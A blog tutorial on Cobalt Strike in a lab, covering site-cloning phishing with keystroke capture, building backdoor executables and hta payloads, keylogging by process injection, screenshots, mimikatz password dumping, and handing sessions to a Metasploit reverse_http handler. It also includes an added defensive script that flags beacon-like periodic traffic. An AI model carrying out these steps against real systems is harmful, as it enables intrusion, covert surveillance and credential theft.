Introduction to the "penetration foundation" cobalt strike Foundation_ Cobalt strike linkage msfconsole
2022-06-24 04:43:00 【Ho1aAs】
This experiment runs in a safe and isolated environment
For teaching purposes only
Environment
- kali: Cobalt Strike 4.3, 192.168.225.129
- winxp: 192.168.225.130
Configure CS
Start the CS server
First grant permissions on the CS folder:
chmod -R 777 ./cobaltstrike4.3
Start the CS server with teamserver ip password, where password is a password of your choice and ip is the public or LAN IP; 127.0.0.1 cannot be used here.

Default port 50050
Log in with the client
sh ./start.sh
Here the client is opened directly on the server, so 127.0.0.1 works, but it is better to fill in the LAN IP.

Web phishing
Select Clone Site

Clone the target website as the phishing page and tick the keystroke-logging option.

The target machine visits the page and enters text.

The typed content is captured.

Target penetration
Create a listener
First create a listener.

Add an HTTP listener; for host select the client IP.
Beacon is CS's built-in listener type, which brings the shell back into CS; Foreign is a listener for hand-off to an external tool, most commonly used in combination with MSF.

Created successfully.

Create a backdoor
There are four kinds of attack packages:

- hta
- office macro
- Customize payload
- exe
The exe option is demonstrated here: configure the corresponding listener, then generate a 32-bit exe.

Save it to the desktop.

For hta, running mshta URL on the target is enough.
The target comes online
This step simulates the victim downloading the malicious exe.
Python file server
Run on the desktop:
python3 -m http.server 8010

The target opens the URL and clicks Run.

This triggers the CS beacon to come online.
CS built-in file server
For convenience, select file server phishing instead.

Select the generated backdoor and give it a different name.
The target opens the URL and clicks Run.

This triggers the CS beacon to come online.

Modify the sleep time
By default the target checks in with the server every 60 seconds to report that it is still alive (which keeps it less noticeable) and to fetch the commands queued for it; to get prompt command output while working, this interval needs to be shortened.

Simply make it smaller; in the demo it is changed to 1s.
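The fixed check-in interval described above is what a defender's periodic-traffic detection keys on. As an added example that is not part of the original post, the script below assumes a simple proxy log format and uses constructed sample lines; it groups requests by source/destination pair and flags pairs whose inter-request gaps are nearly constant, which a 60s default sleep (or the 1s demo value) both produce:

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed sample proxy log (not real traffic). Format assumed here:
# "<ISO time> <src ip> <dst ip> <method> <uri>"
# First host checks in every ~60s; second host browses irregularly.
SAMPLE_LOG = """\
2022-06-24T04:40:00 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:41:00 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:42:01 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:43:00 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:43:59 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:45:00 192.168.225.130 192.168.225.129 GET /pixel.gif
2022-06-24T04:40:03 192.168.225.131 203.0.113.10 GET /index.html
2022-06-24T04:40:04 192.168.225.131 203.0.113.10 GET /style.css
2022-06-24T04:40:17 192.168.225.131 203.0.113.10 GET /news
2022-06-24T04:41:30 192.168.225.131 203.0.113.10 GET /img/a.png
2022-06-24T04:44:50 192.168.225.131 203.0.113.10 GET /about
2022-06-24T04:44:52 192.168.225.131 203.0.113.10 GET /contact
"""


def parse(lines):
    """Yield (timestamp, src, dst) for each non-empty line of the assumed format."""
    for line in lines.splitlines():
        if line.strip():
            ts, src, dst, _method, _uri = line.split()
            yield datetime.fromisoformat(ts), src, dst


def find_beacons(lines, min_hits=5, max_cv=0.15):
    """Return {(src, dst): median gap in seconds} for pairs whose request
    timing is regular enough to look like a fixed-sleep check-in.
    cv = stddev/mean of the gaps: ~0 for a constant sleep, large for browsing.
    Real tooling may add jitter to the sleep, so tune max_cv to your data."""
    by_pair = defaultdict(list)
    for ts, src, dst in parse(lines):
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits[pair] = median(gaps)
    return hits


if __name__ == "__main__":
    for (src, dst), gap in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {dst}, median interval {gap:.0f}s")
```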

Read directory


Process injection to record keyboard input
The target opens a browser.

Browse the process list in CS.

Inject into explore.exe and click Log Keystrokes to record the keyboard.

After a successful injection a new session (the injected process) comes online; as above, don't forget to reduce its sleep time.

When the target types characters in the browser, the CS keystroke log window receives them.

Screenshot

Open the screenshots window to view them.

Retrieve passwords with mimikatz

Cobalt Strike linkage msfconsole
First make sure the beacon is online in CS.

Create a foreign HTTP listener; fill in the public or LAN IP and use an uncommon port.

Then start msf on the CS client machine; here the IP can be 127.0.0.1:
msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit
In effect, the target's requests are now forwarded to msf.

Configure the target to spawn a new session.

Choose the msf listener.

Wait a moment.

Plugin installation
Use the TaoWu plugin: after unzipping, load the cna file.
Then right-click the online machine to use it.

Reference resources
https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike
End
Welcome to follow me CSDN Blog :@Ho1aAs
Copyright belongs to :Ho1aAs
Link to this article :https://blog.csdn.net/Xxy605/article/details/125388547
Copyright notice : This article is original , When reprinted, please indicate the source and this statement